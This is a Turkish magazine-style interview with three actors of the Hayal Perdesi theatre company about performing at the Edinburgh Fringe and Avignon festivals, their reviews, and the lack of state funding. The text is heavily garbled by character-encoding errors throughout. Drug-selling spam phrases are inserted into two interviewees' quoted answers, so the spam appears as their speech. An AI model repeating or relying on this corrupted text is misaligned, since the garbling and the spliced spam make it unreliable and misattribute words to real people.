ai???Korkunun kucaAYAi??nda yaAYayanlar, asla Ai??zgA?r deAYillerdir.ai??? O korku imparatorluAYundan kurtulduAYumuz gA?n, sAi??AYAi??naklarAi??ndan Ai??Ai??kan, yalnAi??zlaAYtAi??rAi??lmAi??AY insanlarAi??n yA?zA?nde gAi??receAYiz, cesaretin gA?zelliAYini. YA?zleAYmenin zehir zemberek tokadAi??yla baAYlayacak kendimizle barAi??AYAi??mAi??z. Ai??AYte o barAi??AYmadan sonra ancak, ai???yarAi??n daha gA?zel bir gA?n olacakai???. VicdanlAi?? bir gerAi??eklik, konforlu bir yalanAi?? alt edecek. Onurumuz bizimle ve yA?reAYimiz her acAi??ya eAYit uzaklAi??kta iken, insanlAi??AYAi??mAi??zla buluAYacaAYAi??z yine. Ve ai???AYA?mA?rzai??? utanAi?? duvarAi?? gibi yansAi??maya devam edecek korkaklarAi??n suretinde.

Bu yA?zleAYmeyi, kendilerinden baAYlayarak Edinburg ve Avignon Festivalleriai??i??ne kadar taAYAi??yan AyAYe Lebriz Berkem, Selin Ai??AYcan ve Reha Ai??zcanai??i??Ai??n yA?zlerinde ise, baAYarmanAi??n gA?zelliAYini, inanmanAi??n direncini ve destek almanAi??n yalnAi??zlAi??AYAi??nAi?? bulacaAYAi??z. AlkAi??AYAi??mAi??zAi?? gA?Ai??lA? tutacaAYAi??z, ya bir gA?n yorulurlarsa diyen iAi??sesimizi duymamak iAi??in…

img_0401

Sezon hiAi?? kapanmadAi?? sizin iAi??in. Yaz boyu hem Edinburgh Fringe hem de Avignon Festivalleriai??i??nde ai???Ai??mparatorluk Kuranlar yahut AzA?mA?rzai??? ve ai???A?Ai?? KAi??z KardeAYai??? oyunlarAi??yla kelimenin tam anlamAi??yla bir Avrupa Ai??Ai??kartmasAi?? yaAYadAi??nAi??z.
Selin Ai??AYcan: Ai??ncelikle dediAYiniz gibi biz TA?rkiye’de sezonun kapalAi?? olduAYu bir dAi??nemde Temmuz- AAYustos aylarAi??nda ai???A?Ai?? KAi??z KardeAYai??? ve ai???Ai??mparatorluk Kuranlarai??? olmak A?zere 36 oyun oynadAi??k Avignonai??i??da, Edinburghai??i??ta. DolayAi??sAi??yla bizim iAi??in sezonun aAi??Ai??lmasAi?? veya kapanmasAi?? gibi bir durum sAi??z konusu olmadAi?? ama zaten bu sAi??ylem de bana tuhaf geliyor. Azimdi her yerde gAi??rA?yorum, ai???kA?ltA?r – sanat sezonu aAi??Ai??ldAi??ai??? yazAi??lAi??yor A?st geAi??itlerde. Bu biten veya baAYlayan bir AYey olamaz. 6 ay boyunca kA?ltA?r ve sanatla ilgilenmedik Ai??stanbul olarak, iAYte AYimdi sAi??rasAi?? geldi, aAi??Ai??yoruz gibi bir sistem var. Bu doAYru bir AYey deAYil tabii ki. Ve ne yazAi??k ki buruk ve eksik aAi??tAi??k sezonu. Levent A?zA?mcA?’nA?n tiyatrodan atAi??lmasAi?? ile baAYlayan, AYimdi de RagAi??p Yavuz ile devam eden sA?reAi?? iAi??in Ai??ok A?zgA?nA?m. Darbe kalkAi??AYmasAi?? sonrasAi??nda bazAi?? genAi?? arkadaAYlarAi??mAi??z iAYten uzaklaAYtAi??rAi??ldAi??. Ai??Ai??lerinden geri dAi??nenler oldu ama bildiAYim kadarAi??yla hA?lA? 8 arkadaAYAi??mAi??z dAi??nemedi. Azu an A?lkemizin iAi??inde bulunduAYu bu FetAi?? soruAYturmasAi??nAi??n gA?venilirliAYini de sarsan bir konu oldu bu bizim iAi??in. Birdenbire hiAi??bir alA?kasAi??nAi??n olmadAi??AYAi??nAi?? bildiAYimiz arkadaAYlarAi??mAi??z, bAi??yle anlaAYAi??lamaz bir mA?dahale ile karAYAi??laAYtAi??. NasAi??l inanabiliriz ki o zaman bu baAYka yerlerde olan uzaklaAYtAi??rmalara?

GA?zel AYeylere tutunmak istiyor insan. O zaman ai???Hayal Perdesiai???ni konuAYalAi??m. Ai??lk oyununuz Boris Vianai??i??Ai??n en Ai??ok oynanan, en AYAi??hretli oyunu ve yazdAi??AYAi?? son oyun olan ai???Ai??mparatorluk Kuranlar Yahut AzA?mA?rzai???. Alexander Popovski ile dAi??rt oyunda birlikte Ai??alAi??AYAi??yorsunuz. Hayal, Ai??nce perdeye dA?AYA?yor, sonra Edinburg Fringe Festivaliai??i??ne kadar gidiyor. O ai???kalkAi??AYmaai??? nasAi??l oluyor?
Selin Ai??AYcan: Biraz Rehaai??i??nAi??n da dediAYi gibi bir delilik oluyor herhalde.
Reha Ai??zcan: Normal bir insanAi??n yapacaAYAi?? bir AYey deAYil.

02

Evet, Reha beyin ifadesiyle ai???muhteAYem inadAi??nAi??zla olmuAYai???.
Selin Ai??AYcan: Ekibin bA?yA?k Ai??zverisi ile oldu aynAi?? zamanda. 2014 yAi??lAi??nda biz Ai??stanbul Tiyatro Festivali kapsamAi??nda prAi??miyerimizi yaptAi??k. Bir sA?re Ai??stanbul’da ve Bursa’da oynadAi??ktan sonra 68. Edinburgh Fringe Festivaliai??i??ne baAYvuru yaptAi??k ve bA?tA?n bunlarAi??n sonucunda, orada oynanan ilk TA?rkAi??e oyun oldu oyunumuz. Festival ve TA?rk Tiyatrosu tarihine geAi??ti. Oradan muhteAYem tepkiler/eleAYtiriler alarak dAi??ndA?kten sonra, bu sene de Avignon ve Edinburghai??i??a tekrar kalkAi??AYtAi??k diyelim ve bu sene Ai??ok Ai??ok daha gA?zel geAi??ti.

Ama siz kalkAi??AYmamAi??AYsAi??nAi??z; davet almAi??AYsAi??nAi??z.
Selin Ai??AYcan: Evet, Edinburghai??i??tan, FransAi??z KA?ltA?r EnstitA?sA?’nden bu kez davet aldAi??k. Bu da aslAi??nda bir sonuAi?? almadAi??r. Ai??lk gidiAYimizin bir sonucudur. Fransaai??i??nAi??n ai???show caseai???inin iAi??ine girdik.

O zaman, bir oyunun davet alarak aynAi?? festivalde ikinci kez oynamasAi??nAi?? da bir ai???ilkai??? olarak kayAi??tlara geAi??irelim.
Selin Ai??AYcan: Evet bu da doAYru.TA?rkiye’den dA?zenli bir katAi??lAi??m olmadAi??AYAi?? gibi, ikinci kez giden oyun hiAi?? yok. Oraya 14 yAi??ldAi??r giden oyunlar var. Mesela Japonya’dan 30 tiyatro vardAi??. Bu anlamda doAYru, dediAYiniz AYekilde Avignon iAi??in de deAYiAYik bir AYey, bir ilk diyebiliriz yine. Biz, ai???A?Ai?? KAi??z kardeAYai??? ve ai???Ai??mparatorluk Kuranlarai???la iki oyunumuzu da gAi??tA?rdA?k. BildiAYim kadarAi??yla bAi??yle bir katAi??lAi??m daha Ai??nce olmamAi??AY. OlmalAi??ydAi?? tabii, bu ayrAi??ca konuAYulacak bir AYey… Bu yAi??l ayrAi??ca Pangar Tiyatro da Avignon’daydAi??. BAi??ylelikle TA?rkiye’den iki farklAi?? tiyatro, A?Ai?? oyunla, bu dA?nyaca A?nlA? festivalin programAi??nda yer almayAi?? baAYarmAi??AY oldu; sanAi??rAi??m 20 yAi??l sonra…

Reha bey, ai???Biz kA?Ai??A?k hayallerimizi taAYAi??dAi??k o masal AYehre. Devler A?lkesine geldik, kA?Ai??A?cA?k kaldAi??kai??? demiAYsiniz. O masal AYehrinin merkezinde de tiyatro varmAi??AY, sokaklar, otobA?slerin ikinci katAi??, her yer performans yeriymiAY. Siz tepeden tAi??rnaAYa tiyatro solurken biz eAY zamanlAi??, burada tiyatronun daha da Ai??telendiAYi gA?nlerin iAi??inden geAi??iyorduk.

img_0408Reha Ai??zcan: Hakikaten bir masaldAi?? o ve biz de o masalAi??n iAi??indeki her AYeyden faydalanmaya Ai??alAi??AYtAi??k. Ai??ok oyun seyrettik, bir sA?rA? insanla konuAYtuk, bir sA?rA? topluluklara girdik.
AyAYe Lebriz:Ai?? Sabah kalkAi??yorsun tiyatro, akAYam yatAi??yorsun tiyatro. Rehaai??i??yla gelir gelmez oyunlara bilet almaya gittik. Bu sene Ai??ok daha bilinAi??li ve seAi??iciydim oyunlar konusunda. GeAi??en yAi??l bA?tA?n C-Venueai??i??deki oyunlarAi?? davetli kartAi??mla izleyebilmiAYtim. Bu sene ise daha deneyimli olduAYumdan farklAi?? sahnelerdeki oyunlara da aAi??Ai??ldAi??k.
Reha Ai??zcan: Azimdi aAi??Ai??lAi??mAi?? kapatmaya Ai??alAi??AYAi??yoruz.
AyAYe Lebriz: Hani aAi?? kurtlar gibi bir AYeye saldAi??rmak deyimi vardAi??r ya, iAYte ben de oyunlara saldAi??rmAi??AYAi??m adeta. Biletlerimi sakladAi??m, herhalde 17 tane biletimiz olmuAY yani oynadAi??AYAi??mAi??z kadar oyun izlemiAYizdir.
Reha Ai??zcan: Sen izlemiAYsindir de ben o kadar izleyemedim.
AyAYe Lebriz:Bir kere oyuncu iAi??in Ai??ok gA?zel bir deneyim. Biz, kendi sAi??nAi??rlarAi??mAi??z iAi??inde Ai??yle ya da bAi??yle bir ai???oyunai??i?? Ai??Ai??karAi??yoruz ama o ai???oyunai??i?? kendi iAi??imizde kalAi??yor. Burada oyunlarAi??mAi??zAi??n deAYerlendirilmesini ve eleAYtirilmesini Ai??nemsiyoruz ama bir de kendi sAi??nAi??rlarAi??mAi??zAi??n Ai??tesinde yaptAi??AYAi??mAi??z ai???oyununai??i?? nerede durduAYunu ve bize nasAi??l geri dAi??neceAYi de Ai??nemli. Festivallerde Ai??nce seyircinin enerjisiyle ve alkAi??AYAi??yla sonra da eleAYtiriler yazAi??lmaya baAYlayAi??nca -ki hepsi birden gurur verici- oyunun ne kadar beAYenildiAYini anladAi??k. BAi??yle yAi??ldAi??zlar baAYAi??mAi??zdan aAYaAYAi?? yaAYAi??nca… Ama Ai??ok AYA?kA?r,Ai?? mA?tevazAi?? bir grubuz. O anlamda Ai??yle uAi??madAi??k. Her oyunu daha da keyifle ve bunun sorumluluAYunu taAYAi??yarak oynadAi??AYAi??mAi??zAi?? sAi??yleyebilirim.

AyaklarAi??nAi??z yerden kesilmiAY, fotoAYraflarda gAi??rA?nA?yor.
AyAYe Lebriz: Selin uAi??muAY. Ben niye uAi??amadAi??m bilemedim.

Sizin ayaklarAi??nAi??z yere saAYlam basAi??yor. ai???MA?tevazAi?? olmak iyidir ama bence oyunumuz, gAi??rdA?klerim iAi??inde Ai??ok iyi bir yerde duruyor diyorsunuzai???. Bunu, yAi??llar iAi??inde oluAYan bakAi??AY aAi??Ai??nAi??zdan sA?zerek sAi??ylA?yorsunuz.Ai?? Kendinizi, oyununuzu dA?nya Ai??lAi??eAYinde konumlandAi??rAi??yorsunuz.
AyAYe Lebriz: KuAYkusuz hepimiz yAi??llarAi??mAi??zAi?? verdik tiyatroya, o yA?zden objektif deAYerlendirme yapabilirmiAYiz gibi geliyor. Oyunumuzun durduAYu yerin bilincindeyim, bu iyi bir yer. BeAYeniler bize Ai??dA?l de, moral de… Bir dahaki iAYlerimiz, bA?tA?n bu yaAYadAi??klarAi??mAi??zAi??n da sorumluluAYunu taAYAi??yarak A?rettiAYimiz iAYler olacaktAi??r. AyrAi??ca festivallerde izlediAYiniz oyunlarAi??n sayAi??sAi?? arttAi??kAi??a A?lkemizdeki tiyatrolarAi??n da iyi bir yerde durduAYunun farkAi??na varabiliyorsunuz. Burada Ai??ok iyi oyunlar var.
Reha Ai??zcan: Daha Ai??ok iAYimiz var, daha Ai??ok sorumluluAYumuz var.

img_0432

VerdiAYiniz selamda hissettiAYiniz o coAYkuyu, o katmanlAi?? sorumluluAYu hissettim diyebilirim.
AyAYe Lebriz:Ai??lk Ai??nce herkesin birey olarak -Reha, AyAYe, Selin olarak- kendine karAYAi?? sorumluluAYu var. Sonra Hayal Perdesi adAi??na, -kurumsal bir kimlik olarak gAi??rev aldAi??AYAi??n tiyatroya karAYAi??- bir sorumluluAYum var. Ve orada olan ya da olmayan yani bizden sonra bu festivallerde yer alacak olan meslektaAYlarAi??ma karAYAi?? sorumluluAYum var. En son olarak da kendi A?lkeme karAYAi?? sorumluluAYum var. O aAi??Ai??dan Ai??ok kAi??vanAi?? duyulacak bir AYeydi.
Selin Ai??AYcan: Ai??statiksel olarak bakAi??ldAi??AYAi??nda, bu yAi??l sanAi??yorum 43 A?lkeden katAi??lAi??m olmuAY. Ai??statiksel bilgiler de verilen Edinburgh Festivaliai??i??ne Ai??ngiltere dAi??AYAi??ndan katAi??lan sanatAi??Ai??lar: ai??? DA?nyanAi??n en bA?yA?k sanat festivali. HiAi??bir AYey onun yerini tutamazai??? baAYlAi??klAi?? The Stage’teki bir makaleden Ai??AYreniyoruz. Hindistan; Ai??inai??i??in 30 ve Hong Kongai??i??un 3 gAi??sterisi ile Ai??eliAYerek festivale yalnAi??z 4 gAi??steri getirmektedir. GA?ney Kore 14, Japonya 10, Tayvan 5, Singapur 2 oyun sahneye Ai??Ai??karmakta iken; festivale yakAi??n olan Rusya ve TA?rkiye 3 oyun sahneye Ai??Ai??karmaktadAi??r. Filistin ise 3 oyun ile festivale katAi??lmaktadAi??r. 2015ai??i??te Ai??ngiltere ile vize ve kA?ltA?rel baAYlarAi??n umut verici AYekilde yeniden kurulmasAi??na raAYmen, maalesef Ai??ranai??i??dan, hiAi??bir takdim olmamAi??AYtAi??r.ai??? diyor. Filistin’den 3 oyun gitmiAY, biz burada tek bir oyunla gidebilmek iAi??in adeta KurtuluAY SavaAYAi?? veriyoruz… Ve TA?rkiye’yi temsil etmiAY oluyoruz. Bu sebeple tabii ki sorumluluAYu bA?yA?k. Neyse ki son derece baAYarAi??lAi?? bir AYekilde tamamladAi??k. Bir kenarda da kalabilirdi, gAi??rA?nmeyebilirdi de. OnlarAi??n kriterlerine gAi??re sAi??yleyeyim, her A?lkede yAi??ldAi??z sistemi yok, yani oyunlara yAi??ldAi??z vererek deAYerlendirme yapAi??lAi??yor, eleAYtiri yazAi??lAi??yor aynen buradaki gibi. Mesela Avignonai??i??da yok, Almanya’da yok. Avignon ‘da da ‘Un grand bravo Hayal Perdesi’: ‘Bir bA?yA?k Bravo Hayal Perdesi, Ai??mparatorluk Kuranlar muhteAYem bir oyun ‘ yazAi??ldAi??, tabii bunlar Ai??ok mutlu ediyor…

Reha Ai??zcan: EleAYtiri Ai??Ai??kmasAi?? bile Ai??ok Ai??nemli Avignonai??i??da. Yani onu yakalamasAi??.

19

Scotsman, The Stage, The List, The Skinny, ThreeWeeks ve BroadwayBabyai??i??den hep dAi??rt yAi??ldAi??z almAi??AYsAi??nAi??z.
Selin Ai??AYcan: Ai??ki ya da bir yAi??ldAi??z da olabilirdi, bizi A?zecek sonuAi??lar da gelebilirdi ama gelmedi. Bu yine bizim iAi??in Ai??ok Ai??nemliydi. ai???The Scotsmanai??? -yani oranAi??n ai???Independentai???Ai?? diyelim- onlarAi??n bAi??rakAi??n yazmalarAi??nAi??, gerAi??ekten gelmeleri bile Ai??ok zor. Gelmeleri Ai??ok Ai??nemliydi ve oldukAi??a da geniAY yer ayAi??rdAi??lar. Mesela bazen yazAi??lanlarAi??n iAi??inden en Ai??ok hangi cA?mleden etkilendin diye soruyorlar. Benim iAi??in unutamayacaAYAi??m Ai??ok AYey var ama, The Skinny’nin tiyatro editAi??rA? Rachel Bowles’un oyun hakkAi??ndaki eleAYtiri yazAi??sAi??nda ai???TA?rk tiyatro topluluAYu Hayal Perdesi TA?rkiye iAi??in yapAi??lmAi??AY performanslar konusundaki boAYluAYu doldurmak iAi??in Ai??ok Ai??nemli bir konumda olmasAi??nAi??n yanAi?? sAi??ra Boris Vianai??i??Ai??n absA?rt ve bA?yA?leyici oyunu ai???Ai??mparatorluk Kuranlarai??? oyunu bA?yA?k bir ustalAi??kla sergilemesi ile Avrupa’da pek Ai??ok Ai??dA?lA? silip sA?pA?rmA?AY durumdaai???. PopA?ler bir Milano tiyatro gazetesi, ai???Avrupa sAi??nAi??rlarAi??nAi?? aAYan yapAi??m cazibesini yakalayarak, yapAi??mAi?? AvrupalAi?? siyasetAi??ilerin baAYarAi??sAi??z olduAYu alanda gA?zel bir zafer olarak tanAi??mladAi??ai??? pargrafAi?? Ai??nemliydi. Ai??ngiliz basAi??nAi?? bAi??yle gAi??rdA?… AzAi??yle yer aldAi??k dA?nya basAi??nAi??nda:68 ve 69.Edinburgh Fringe Festivali ve Milano’da sonuAi?? AYAi??yle oldu: a?i??a?i??a?i??a?i?? The Scotsman a?i??a?i??a?i??a?i?? The List a?i??a?i??a?i??a?i?? The Stage a?i??a?i??a?i??a?i?? The Skinny a?i??a?i??a?i??a?i?? Broadwaybaby Ai??a?i??a?i??a?i??a?i?? Three Weeks Edinburgh Ai??a?i??a?i??a?i??a?i?? Krapp’s Last Post – Milano

ai???Hayal Perdesiai??i??nin Ai??mparatorluk Kuranlar prodA?ksA?yonuna teAYekkA?r etmeliyim…ai??? Mark Lawson ai??i?? GUARDIAN

“Ai??stanbul’dan gelen bir tiyatro, Edinburgh’ta baAYka bir tarih yazAi??yor. Ai??mparatorluk Kuranlar Fringe tarihinde sahnelenen ilk TA?rkAi??e oyun” THE TIMES

ai???TA?rklerin oyunculuAYu Edinburgh Fringe Festivali’nde tarih yazAi??yor.ai??? Tim Cornwell

img_0428

Benim de dikkatimi Ai??eken: ai???La Provenceai???in ai???TA?rkiyeai??i??nin kaotik durumuna raAYmen ai???Ai??mparatorluk Kuranlarai??? oyununu oynayan tiyatro bir cesaret sembolA?dA?rai??? cA?mlesi oldu. Milano demiAYken, II Teatro Nudo di Teresa Pomodoro UluslararasAi?? Ai??dA?lA?ai??i??ne aday olmasAi??, ai???geleneksel tiyatro biAi??imlerinin Ai??tesinde, deAYiAYik anlatAi??m yollarAi?? deneyen uluslararasAi?? prodA?ksiyonlar iAi??in Ai??ngAi??rA?lmesiai??? anlamAi??nda da Ai??ok deAYerli.
Reha Ai??zcan: SeAi??ilen seAi??ki zaten baAYlAi?? baAYAi??na bir Ai??dA?l. SeAi??kiyi belirleyen 10 kiAYilik bir jA?ri var. OnlarAi??n seAi??tiAYi 10 tane oyundan bir tanesi olmasAi?? zaten bizim iAi??in bir Ai??dA?l. Bir de burada kasAi??m ayAi??nda aAi??Ai??klanacak bir Ai??dA?ller silsilesi var ama zaten o seAi??kinin iAi??erisine girip Milano’da oynayarak, biz o Ai??dA?lA? aldAi??k. MuhteAYemdi Milano’da oynamak. Bir AYeye inat edersiniz, iAYte oradaki deli cesareti, Ai??Ai??lgAi??nca ve bA?yA?k riskler alarak yapAi??ldAi?? bu da. Hayatta, bu liberalizmin en Ai??nemli AYeyidir ya risk almak… Ekonomik anlamda, sanatsal anlamda da artAi??k risk almak gerekiyor, taAYAi??nmak gerekiyor. Hep Ai??yledir ya, bilim, kA?ltA?r, sanat gibi AYeyler saygAi?? duyulmadAi??AYAi?? yerden, saygAi?? duyulduAYu topraklara gAi??Ai?? eder. Konudan konuya geAi??iyorum ama Avignonai??i??da 8 tane oyun seyrettim ama sonra eAY zamanlAi?? yapAi??lan Sirk Festivalini keAYfettim. Avignonai??i??da seyrettiAYim oyunlar iAi??erisinde beni en Ai??ok Ai??arpan Pangarai??i??Ai??n oyunu oldu. Bir de onu orada seyretmek Ai??ok deAYerliydi. FransAi??z seyircilerle birlikte AyAYenilai??i??in sahneye koymuAY olduAYu oyunu seyrederken seyirci gA?lA?yordu ama ben aAYlAi??yordum. TA?ylerim diken diken oldu. Ai??ok gA?zeldi. Hepsi Ai??ok gA?zel oynuyor. Bence Ai??ok baAYarAi??lAi?? bir reji ve gurur duydum. KeAYke geAi??en sene etkilendiAYim oyunlardan birkaAi?? tanesi daha AYuraya getirilirse diye dA?AYA?ndA?m ama biliyorum ki AYartlar Ai??ok zor. Emin olun, kAi??zAi??yoruz oyuncularAi??n dizilerde oynamasAi??na ya da para kazanacak baAYka iAYlere girmesine ama -leblebiciler derdi rahmetli Mehmet Ulusoy-Ai?? Ama baAYka tA?rlA? de bir destek yok. Yurt dAi??AYAi??nda, baAYka oyunlara baktAi??AYAi??nAi??z zaman, adamlar oyunla ilgili 3 sayfasAi??nAi?? koyuyorlar broAYA?re. BroAYA?rA?n geri kalan 12 ile 36 sayfasAi?? sponsor.
Selin Ai??AYcan: ArtAi??k sponsor logolarAi?? sAi??AYmamAi??AY broAYA?re yani o kadar Ai??ok var ki.
Reha Ai??zcan: Biz de sponsor 4-5 tane yok.
Selin Ai??AYcan: 2 yAi??ldAi??r BeAYiktaAY Belediyesi ve Western Unionai??i??un katkAi??larAi?? var; bu Ai??ok deAYerli bizim gibi sanatAi??Ai??sAi??nAi??n bu kadar yalnAi??z olduAYu bir A?lkede, Ai??ok teAYekkA?r ederiz… Bu yAi??l Avignon yolculuAYunun uAi??ak biletlerini de KA?ltA?r BakanlAi??AYAi?? TanAi??tAi??m Genel MA?dA?rlA?AYA?’nA?n almasAi?? Ai??nemli bir katkAi?? oldu. Ama tabii ki en bA?yA?k katkAi??, emeAYimiz, tabiri caizse kan, ter ve gAi??zyaAYAi??mAi??z. ai???Hayal Perdesiai???nin maddi olarak Ai??ok bA?yA?k bir yA?kA?n altAi??na girmesi. GeAi??en yAi??l Ai??yle deAYildi. GeAi??en yAi??l, BaAYbakanlAi??k TanAi??tAi??m Fonuai??i??ndan destek almAi??AYtAi??k. Bu sene baAYvurumuza herhangi bir cevap alamadAi??k hA?lA?… Buradaki problem; zaten BaAYbakanlAi??k TanAi??tAi??m Fonuai??i??na bizim savrulmamamAi??z gerekirdi. Yani KA?ltA?r BakanlAi??AYAi??’nda uluslararasAi?? festivallere gitmek isteyen tiyatrolar olarak baAYvurabileceAYimiz bir fon olmasAi?? gerekir. Bunca yAi??ldAi??r bu nasAi??l yok veya bunu yasalarla bir koruma altAi??na nasAi??l almamAi??AYlar anlamak mA?mkA?n deAYil. Ai??A?nkA? biraz iAYin iAi??ine girdiAYimizde, baAYka BakanlAi??klarai??i??da, baAYka sektAi??rlerde, bunun olduAYunu gAi??rdA?k. Mesela Ekonomi BakanlAi??AYAi??’nda var. Fuarlara giden AYirketlerin masraflarAi??nAi??n %50ai??i??sini karAYAi??lAi??yor. Turizmde Ai??ok fazla destek var. Fakat biz Ai??ok yalnAi??zAi??z. Bunu her zaman sAi??ylA?yorum. Biz Ai??ok yalnAi??zAi??z. BAi??yle olmaz. Bu yapAi??lan AYeyler, bireysel Ai??aba olarak kalAi??r ve bu insanlar bir gA?n yorulduAYunda, TA?rkiye’nin o Festivallerai??i??de adAi?? bile geAi??mez, dA?nyayla buluAYamaz.
Reha Ai??zcan: Ai??ok basit bir mantAi??k var aslAi??nda. GeAi??miAYe dAi??nA?p baktAi??AYAi??mAi??z zaman, Ai??ocukluktan ergenliAYe geAi??iAYte kiAYiyi etkileyen bir AYey vardAi??r. Ya bir film vardAi??r ya da bir tiyatro oyunu vardAi??r. Ai??AYte o dAi??nemlerden sonra tanAi??dAi??AYAi??m Gratowskiai??i??nin metodunu uygulayan bir oyun seyretmek iAi??in olaAYanA?stA? Ai??aba sarf ettim ve muhteAYem bir oyun daha seyrettik. Edinburghai??i??ta, FransAi??z EnstitA?sA?’nde oynanan bA?tA?n oyunlarla ilgili oturup ai???AYurada AYAi??yle oluyor, burada bu teknik kullanAi??lAi??yor, burada montaj tekniAYi yapmAi??AYlarai??? diye konuAYunca durdular ve bizi dinlemeye baAYladAi??lar. Ai??A?nkA? orada baAYka bir iAYletim sistemi var. Biz burada, baAYka tA?rlA? bir iAYletim sistemiyle yaAYAi??yoruz. Ai??A?nkA? oyuncu olarak sahneye Ai??Ai??kAi??p oyunu oynamaktan mA?tevellit bir iAYimiz yok. Dekordan da anlayacaAYAi??z, Ai??AYAi??ktan da anlayacaAYAi??z, kostA?mden de anlayacaAYAi??z. BAi??yle bir hayatAi??nAi??z var. Bu yA?zden bize daha Ai??ok tiyatro adamAi?? gibi bakAi??yorlar, oyuncu gibi bakmAi??yorlar ve bu gurur verici bir AYey. Bunun taAYAi??nmasAi?? lazAi??m. DolayAi??sAi??yla A?lkeyi en iyi tanAi??tacak AYey, doldur boAYalt sistemi ile oluAYan sportif faaliyetler deAYildir. Sen istediAYin kadar AfrikalAi??ai??i??yAi?? TA?rkiyeai??i??de oynat. Onlar TA?rk deAYil. Ai??stediAYin kadar Almanya’dan altyapAi??dan yetiAYen futbolcularAi?? al. Onlar TA?rk deAYil. Bizim kendimize ait sanat eserlerimiz etkiler ve etkiliyorlar da. Avignonai??i??da tA?ylerimizi diken diken eden Thobias diye bir insanla tanAi??AYtAi??k. O Ai??ok Ai??zel bir arkadaAYAi??mAi??z artAi??k. 80 yaAYAi??nda. DA?nyanAi??n her tarafAi??nda yaAYamAi??AY.
Selin Ai??AYcan: KAi??zAi?? Boris Vianai??i??Ai??n sevgilisiymiAY galiba.
Reha Ai??zcan: Adam gelirken: ai???Yani TA?rkler ve Boris Vian ne alA?ka diye yazdAi??m ama gAi??rdA?AYA?m AYey… Ben size ne yapayAi??m AYimdi? Sizi neremde saklayayAi??m?ai??? dedi.
Selin Ai??AYcan: Seyirci mailleri aldAi??k ayrAi??ca.
Reha Ai??zcan: Edinburghai??i??ta bir oyun seyrettim. Bizden Ai??nce ai???The Othersai??? diye bir oyun vardAi??. Biz onlarAi?? tebrik ettik.Ertesi gA?n de onlar bizim oyunumuzu seyrettiler. Oyundan sonra ai???sizinle konuAYmamAi??z lazAi??mai??? diye heyecandan Ai??ldA?ler. Buradaki Ai??ok farklAi??, Ai??ok deAYerli bir deneyim. A?lke iAi??in bunlarAi??n daha fazla yapAi??lmasAi?? lazAi??m. Biz ai???offai???lara gidiyoruz ama ai???inai???lere girmemiz lazAi??m, ai???inai???lerde bir AYeyler yapmamAi??z lazAi??m. Kendi rejisAi??rlerimizi, senaryolarAi??mAi??zAi?? Ai??Ai??karmamAi??z gerekiyor. Kendi yazarlarAi??mAi??za daha fazla olanak vermemiz gerekiyor ve kendimize yeni bir A?slup bulmamAi??z gerekiyor. Evet biz AYu anda yAi??netmenimiz ve kostA?m tasarAi??mcAi??mAi??z ile uluslararasAi?? bir iAY yapAi??yoruz ama bize ait bir AYeylerle Ai??ok daha Ai??arpAi??cAi?? AYeyler yapabiliriz. Pangarai??i??Ai??n iAYi biraz Ai??yleydi. Daha bir sA?rA? iAY var bA?tA?n dA?nyanAi??n gAi??rmesi gereken.

32

AslAi??nda bu bA?yA?k Ai??lAi??ekli buluAYmalarAi??n kA?Ai??A?k izdA?AYA?mleri Ai??ok Ai??zel. Ai??rneAYin PolonyalAi?? bir akrist, ai???A?Ai?? KAi??z KardeAYai???i izledikten sonra ai???bana aktrist olmanAi??n ne kadar gA?zel bir AYey olduAYunu hatAi??rlattAi??nAi??z diyerekai??? size bir teAYekkA?r e-mailai??i??i yazmAi??AY.
Selin Ai??AYcan: ai???HayatAi??mAi??n en iyi oyunu izledim ve hayatAi??m boyunca unutmayacaAYAi??mai??? dedi. Tabii Ai??ok AYaAYAi??rAi??yorlar. Belki de beklemiyorlar. Belki de biz maalesef TA?rk Tiyatrosu olarak nadiren dAi??AYarAi?? Ai??Ai??kabildiAYimiz iAi??in, bu tA?r buluAYmalar Ai??ok az olduAYu iAi??in bilmiyorlar. HiAi?? izlememiAYler. Belki dilimizi bile duymamAi??AYlar. O yA?zden karAYAi??laAYtAi??klarAi?? AYeyden de Ai??ok bA?yA?k AYaAYkAi??nlAi??kla Ai??Ai??kAi??yorlar. BeAYenince AYaAYAi??rAi??yorlar. BA?yA?k heyecan duyuyorlar. Ai??ok gA?zel.
Reha Ai??zcan: TA?rk dili de Ai??ok ilginAi?? geliyor onlara. BaAYka bir AYiir gibi diyorlar.
Selin Ai??AYcan: Purchase lady era 100mg Evet, Twitter’da biri ai???Azu anda Ai??mparatorluk Kuranlarai??i??Ai??n DVDai??i??den tekrar izliyorumai??? diye yazmAi??AY. Oyunu izlemiAY, herhalde tekrar izliyor.ai???TA?rkAi??e ne kadar mA?zikal bir dilai??? diye yazmAi??AY.

Agence France Pressai??i??ten Juliette Rabat, her iki (Avignon, Edinburgh) festivali izleyen topluluklarla gAi??rA?AYA?p onlarAi??n deneyimlerini konuAYmak istemiAY ama bu kriterlere uyan topluluk bulamamAi??AY sizden baAYka.
Selin Ai??AYcan: Bu da Ai??ok ilginAi?? ve Ai??ok gA?zel bir anekdot. Bizi Edinburgai??i??ta buldu ve Ai??ok memnun oldu. AslAi??nda Fransuz KA?ltA?r EnstitA?sA?ai??i??nden bir ekip daha bulmuAY. Fakat onlarAi??n Edinburghai??i??a ilk geliAYleriymiAY ve yeni geldikleri iAi??in hiAi??bir deneyimlerinden bahsedememiAYler. Bizimse ikinci geliAYimiz. DolayAi??sAi??yla Avignon ve Edinburgh Festivalleri’ni karAYAi??laAYtAi??racaAYAi?? makalesi iAi??in aradAi??AYAi?? AYeyi bizde bulmuAY oldu. Bunun TA?rkiye’den gelmiAY bir topluluk olmasAi?? da bana Ai??ok ilginAi?? geldi. GerAi??ekten, bu A?zerinde dA?AYA?nA?lebilecek bir AYey…

img_0412

Orada oyununuz iAi??in dAi??nen bir giAYe kuyruAYunu gAi??rmek nasAi??l bir duyguydu?
AyAYe Lebriz: Purchase micronase medication AslAi??nda bir endiAYe de olmuyor deAYil. Kendimi deplasmanda gibi hissettiAYim oldu. Seyirci gelecek mi, gelmeyecek mi, ne olacak diye meraktaydAi??m. Ai??lk bir kaAi?? gA?n ilgi oldukAi??a yA?ksekti. Sonra biraz dA?AYA?AY oldu. Sonra o kuyruAYu gAi??rA?nce de… Ai??AYte, o baAYka bir mutluluktu.
